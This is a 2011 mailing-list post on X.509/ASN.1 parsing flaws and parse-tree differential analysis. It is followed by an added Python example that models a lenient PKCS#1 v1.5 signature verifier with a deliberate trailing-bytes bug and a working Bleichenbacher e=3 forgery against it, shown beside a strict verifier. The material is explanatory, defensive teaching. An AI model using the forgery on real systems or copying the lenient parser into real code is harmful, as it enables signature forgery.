[SSL Observatory] Interesting fun with Verisign and X.509 by Kaminsky, Patterson, Sassaman

Len Sassaman len.sassaman at gmail.com
Thu May 5 00:46:50 PDT 2011


Hi Chris,

This is, of course, work that is nearly two years old. (We issued a
white-paper under embargo in early 2009, gave a presentation on it at
Black Hat that year, and then the paper you linked to was published at
FC 2010.) The bulk of the ASN.1 problems we disclosed were fixed by
the major affected parties prior to the Black Hat talk. It was not
specifically a Verisign problem.

That said, I'm convinced there are more such problems waiting to be
discovered. The key contribution of that paper is really not the
findings, but the methodology we developed, and it's applicable to far
more than just ASN.1 or X.509 — but please don't take that to mean
there aren't still attacks to be found by parse-tree differential
analysis in X.509; S/MIME and STARTTLS are obvious targets, and OCSP
keeps me up at night.

I'm currently working on a paper expressing the fundamentals of the
analysis methods we've developed (both as used in this paper, to aid
auditing, as well as being the basis of a strong defense against
malicious input — e.g., we have code for a PKCS#1 parser validator
that would have protected against the Bleichenbacher "e=3" attack, had
it been incorporated into OpenSSL and NSS.) I'm hoping to see
automated parse-tree differential tools integrated into the usual code
analysis suites eventually.

I'm happy to send a draft, when it's finished, to this list if there's interest.


—Len.

On Wed, May 4, 2011 at 7:45 PM, Chris Palmer <chris at eff.org> wrote:
> https://www.cosic.esat.kuleuven.be/publications/article-1432.pdf
>
> """In this paper, we demonstrate two new classes of collision, which will be somewhat trickier to address than previous attacks against X.509: the applicability of MD2 preimage attacks against the primary root certificate for Verisign, and the difficulty of validating X.509 Names contained within PKCS#10 Certificate Requests. We also draw particular attention to two possibly unrecognized vectors for implementation flaws that have been problematic in the past: the ASN.1 BER decoder required to parse PKCS#10, and the potential for SQL injection from text contained within its requests."""
>
>
> --
> Chris Palmer
> Technology Director, Electronic Frontier Foundation
> https://www.eff.org/code
>
>

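The PKCS#1 v1.5 validation problem Len alludes to, as an added example that is not part of the original thread or of the authors' code: a lenient signature verifier that reads the DER DigestInfo and ignores whatever follows it, beside a strict one that re-encodes the expected encoded message and compares byte for byte, with Bleichenbacher's e=3 cube-root forgery run against both. The key (generated with a fixed seed), messages and helper names are constructed for this example; the lenient parser is a simplified model of the 2006-era flaw, not the actual OpenSSL or NSS code.

```python
"""Bleichenbacher e=3 forgery vs. lenient and strict PKCS#1 v1.5 verifiers.
Added example; keys and messages are constructed here (fixed seed)."""
import hashlib
import hmac
import random

# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
E = 3
_rng = random.Random(20110505)  # constructed, deterministic key material
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


def _is_probable_prime(n, rounds=16):
    """Trial division by small primes, then Miller-Rabin."""
    if any(n % p == 0 for p in SMALL_PRIMES):
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits):
    while True:
        c = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        # e=3 needs gcd(3, p-1) == 1, so reject p == 1 (mod 3)
        if c % 3 != 1 and _is_probable_prime(c):
            return c


def generate_key(bits=2048):
    """Returns (n, d) for public exponent E=3.  Requires Python 3.8+ for pow(-1)."""
    p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def _emsa_pkcs1_v15(msg, k):
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")


def verify_lenient(msg, sig, n):
    """Model of the flawed check: walk the padding, parse one DER DigestInfo,
    compare it, and never notice that bytes remain after it."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i + 3 > k or em[i] != 0x00 or em[i + 1] != 0x30:  # 0x30 = DER SEQUENCE
        return False
    length = em[i + 2]                      # short-form length only
    digest_info = em[i + 1:i + 3 + length]
    if len(digest_info) != 2 + length:
        return False
    # BUG: trailing bytes after digest_info are silently ignored
    return digest_info == SHA256_DIGESTINFO + hashlib.sha256(msg).digest()


def verify_strict(msg, sig, n):
    """Re-encode the expected EM and require full equality: any garbage after
    the DigestInfo changes the padding length and the comparison fails."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    return hmac.compare_digest(em, _emsa_pkcs1_v15(msg, k))


def _icbrt_ceil(x):
    """Smallest s with s**3 >= x (binary search on integers)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg, n):
    """Bleichenbacher's forgery: EM = 00 01 FF 00 || DigestInfo || zeros.
    Cubing the rounded-up cube root only disturbs the low ~2/3 of the bits,
    which is exactly the region a lenient parser never inspects, and s**3 < n
    so no private key is needed."""
    k = (n.bit_length() + 7) // 8
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    em = b"\x00\x01\xff\x00" + t + b"\x00" * (k - len(t) - 4)
    return _icbrt_ceil(int.from_bytes(em, "big")).to_bytes(k, "big")


def demo():
    n, d = generate_key()
    msg, evil = b"constructed sample message", b"attacker-chosen message"
    good, forged = sign(msg, n, d), forge(evil, n)
    return {
        "lenient_accepts_genuine": verify_lenient(msg, good, n),
        "strict_accepts_genuine": verify_strict(msg, good, n),
        "lenient_accepts_forgery": verify_lenient(evil, forged, n),
        "strict_accepts_forgery": verify_strict(evil, forged, n),
    }


if __name__ == "__main__":
    print(demo())
```

The forgery only works because the lenient parser treats the encoded message as something to be walked rather than something to be compared: with a 2048-bit modulus the prefix occupies about 440 bits and the cube-root rounding error stays below 2^1360, comfortably inside the 1600-odd bits of trailing space the parser never reads. The strict verifier removes the parser from the trust boundary entirely, which is the "validator" shape Len describes.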